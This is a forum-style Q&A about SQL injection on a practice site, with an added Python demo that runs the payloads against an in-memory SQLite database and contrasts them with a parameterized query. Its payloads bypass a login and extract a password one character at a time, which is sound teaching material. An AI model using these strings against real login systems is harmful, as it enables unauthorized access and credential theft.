I'm testing some SQL stuff on sqlzoo.net/hack and I'm not getting why
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '__w%') AND ''='
does work for the SQL injection and
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '__w%')
not. Why is it necessary to put this last
AND ''='
?
Also I guess that these SQL injections are very 'old' and won't work. Are there newer methods and are there sites where someone can learn this?
Thanks in advance.
Because you need to close the '.
The code that checks for the password may be something like this:
"SELECT * FROM usersPassword where password = '" + TEXTINPUT + "';"
If you want to simply go in, ' OR ''='
will do the job.
The complete query will be
"SELECT * FROM usersPassword where password = '' OR ''='';"
which is an always true condition.
The example on the website does something more. It checks what the password of a certain user looks like: if a certain character is present, you will know by the fact that you're able to log in.
EDIT:
In your case the final query will be
"SELECT * FROM usersPassword where password = '' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''=''"
if you don't put the AND
"SELECT * FROM usersPassword where password = '' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%')'"
----> which does not close !
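As an added illustration (not from the original thread), here are the queries from the answer run against a constructed in-memory SQLite database: the payload ending in AND ''=' produces a query that parses and logs in, the one without it leaves a quote open and is rejected by the parser, and a parameterized query treats the same input as plain data. The table contents, the sample password 'bow-wow', and the function names are assumptions for the demo.

```python
import sqlite3

# Constructed sample tables standing in for the usersPassword/users tables in the answer.
SCHEMA = """
CREATE TABLE users (name TEXT, password TEXT);
INSERT INTO users VALUES ('jake', 'bow-wow');      -- third character is 'w', so '__w%' matches
CREATE TABLE usersPassword (password TEXT);
INSERT INTO usersPassword VALUES ('s3cret');
"""

# The two inputs from the question, plus one whose LIKE pattern does not match (assumed).
PAYLOAD_CLOSED = "' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '__w%') AND ''='"
PAYLOAD_OPEN = "' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '__w%')"
PAYLOAD_MISS = "' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '__x%') AND ''='"


def fresh_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_login(text_input):
    """The concatenated query from the answer. Returns 'ok', 'denied' or 'syntax error'."""
    query = "SELECT * FROM usersPassword WHERE password = '" + text_input + "';"
    con = fresh_db()
    try:
        rows = con.execute(query).fetchall()
    except sqlite3.OperationalError:
        # An unbalanced quote leaves an unterminated string literal; the parser rejects it.
        return "syntax error"
    return "ok" if rows else "denied"


def safe_login(text_input):
    """Parameterized version: the input is bound as a value, never spliced into the SQL."""
    con = fresh_db()
    rows = con.execute(
        "SELECT * FROM usersPassword WHERE password = ?;", (text_input,)
    ).fetchall()
    return "ok" if rows else "denied"
```

The closed payload logs in only when the EXISTS subquery is true, which is the character-by-character check the answer describes; the parameterized version returns no row for any of the three inputs.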